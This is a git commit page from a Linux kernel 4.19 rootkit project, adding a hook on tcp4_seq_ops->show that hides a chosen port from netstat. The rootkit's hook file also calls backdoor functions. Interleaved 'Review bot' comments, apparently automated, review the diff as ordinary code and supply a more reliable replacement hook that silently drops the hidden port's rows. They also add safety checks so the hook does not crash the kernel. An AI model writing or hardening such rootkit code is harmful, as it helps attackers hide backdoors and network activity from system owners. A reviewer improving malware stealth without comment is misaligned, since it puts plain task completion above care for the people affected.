linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit e1466a6380dc21f48816d4c0931cd5a7b8f12334
parent 8405e52af84657fbe0be4b5e1f96d5a0b5659bb3
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat, 12 Dec 2020 00:35:55 +0100

WIP Add initial code for netstat sockhiding

Diffstat:
Msrc/hook.c | 5+++++
Asrc/sockhide.c | 65+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/sockhide.h | 3+++
3 files changed, 73 insertions(+), 0 deletions(-)

diff --git a/src/hook.c b/src/hook.c
@@ -20,6 +20,7 @@
 #include "pidhide.h"
 #include "openhide.h"
 #include "read.h"
+#include "sockhide.h"
 
 extern rootkit_t rootkit;
 
@@ -79,6 +80,8 @@ init_hooks(void)
 		backdoor_read();
 	else if (rootkit.backdoor == BD_TTY)
 		backdoor_tty();
+
+	hook_show();
 }
 
 void
@@ -100,6 +103,8 @@ remove_hooks(void)
 
 	if (rootkit.backdoor != BD_OFF)
 		unbackdoor();
+
+	unhook_show();
 }
 
 void
diff --git a/src/sockhide.c b/src/sockhide.c
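Review bot: `hook_show()` at the end of init_hooks returns void, so init_hooks cannot tell whether the tcp4_seq_ops lookup and hook installation succeeded, yet `unhook_show()` in remove_hooks runs unconditionally; judging from the sockhide.c side of this commit, a hook that was never installed leaves the saved original pointer NULL and teardown would then write that NULL into tcp4_seq_ops->show. I would have hook_show return an int and make the teardown depend on it, e.g. `if (hook_show() < 0) DEBUG_INFO("tcp4 show hook failed\n");` in init_hooks paired with a guard in unhook_show that skips the restore when its saved pointer is NULL. Both init_hooks and remove_hooks begin outside this hunk.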
@@ -0,0 +1,65 @@
+#include <linux/kernel.h>
+#include <linux/seq_file.h>
+
+#include "common.h"
+#include "hook.h"
+
+#define SIZE_PORT_COLON 6
+
+typedef unsigned short port_t;
+
+static port_t to_hide = 41821;
+
+static int (*tcp4_seq_show)(struct seq_file *seq, void *v);
+static int (*udp4_seq_show)(struct seq_file *seq, void *v);
+static int (*tcp6_seq_show)(struct seq_file *seq, void *v);
+static int (*udp6_seq_show)(struct seq_file *seq, void *v);
+
+static int g7_tcp4_seq_show(struct seq_file *seq, void *v);
+
+void
+hook_show(void)
+{
+	tcp4_seq_show
+		= ((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show;
+
+	disable_protection();
+	((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show
+		= (void *)g7_tcp4_seq_show;
+	enable_protection();
+
+	DEBUG_INFO("tcp4 show has been hooked!\n");
+}
+
+void
+unhook_show(void)
+{
+	disable_protection();
+	((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show
+		= (void *)tcp4_seq_show;
+	enable_protection();
+}
+
+static void
+hide_netstat(char *port, struct seq_file *seq)
+{
+
+}
+
+//seq includes all the info we need
+//https://elixir.bootlin.com/linux/v4.19/source/include/linux/seq_file.h#L16
+static int
+g7_tcp4_seq_show(struct seq_file *seq, void *v)
+{
+	int ret = tcp4_seq_show(seq, v);
+
+	//Ports are displayed as uppercase hex
+	//Since we don't want to detect random hex strings, we add the colon
+	char hex_port[SIZE_PORT_COLON];
+	sprintf(hex_port, ":%04X", to_hide);
+
+	if(strstr(seq->buf, hex_port))
+		hide_netstat(hex_port, seq);
+
+	return ret;
+}
diff --git a/src/sockhide.h b/src/sockhide.h
@@ -0,0 +1,2 @@
+void hook_show(void);
+void unhook_show(void);
+\ No newline at end of file
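Review bot: `strstr(seq->buf, hex_port)` in g7_tcp4_seq_show scans a buffer that is neither NUL-terminated beyond seq->count nor limited to this call's record: seq_file calls show() repeatedly into the same buffer, so earlier records of the chunk are rescanned (and would be "found" again) and the search can run past the valid bytes when the record happens to end at the fill point. It also matches any `:XXXX` substring, so a tx_queue:rx_queue value that begins with the port's hex digits is a false hit, and `sprintf` into the 6-byte hex_port only fits because port_t is 16 bits; `snprintf(hex_port, sizeof hex_port, ...)` would make that explicit. The more robust approach is to decide before calling the original: every pointer tcp4_seq_show prints in 4.19 (full sock, timewait sock, request sock) begins with struct sock_common, so sk_num (host order) and sk_dport (network order) can be compared against to_hide and the hook returns 0 to emit nothing, which removes hide_netstat and the text parsing entirely; this needs `#include <net/sock.h>` and I would confirm the TCP_NEW_SYN_RECV case on the target kernel. Separately, hook_show and unhook_show dereference the result of kallsyms_lookup_name("tcp4_seq_ops") without a NULL check, which oopses if the symbol is not found, so `struct seq_operations *ops = (void *)kallsyms_lookup_name("tcp4_seq_ops"); if (!ops) return;` belongs in both before the write.
```c
static int
g7_tcp4_seq_show(struct seq_file *seq, void *v)
{
	struct sock *sk = v;

	/* sock_common is the shared prefix of struct sock, inet_timewait_sock
	 * and request_sock, so sk_num / sk_dport are readable for every entry
	 * tcp4_seq_show emits. Returning 0 without writing to seq drops the row. */
	if (v != SEQ_START_TOKEN
	    && (sk->sk_num == to_hide || ntohs(sk->sk_dport) == to_hide))
		return 0;

	return tcp4_seq_show(seq, v);
}
```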
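Review bot: sockhide.h has no include guard, so a second inclusion from another translation unit's headers (hook.c already pulls in several) would redeclare the prototypes; wrap the two declarations in `#ifndef SOCKHIDE_H` / `#define SOCKHIDE_H` / `#endif`, matching whatever guard style the project's other headers use. The missing trailing newline reported by the diff is worth fixing in the same pass.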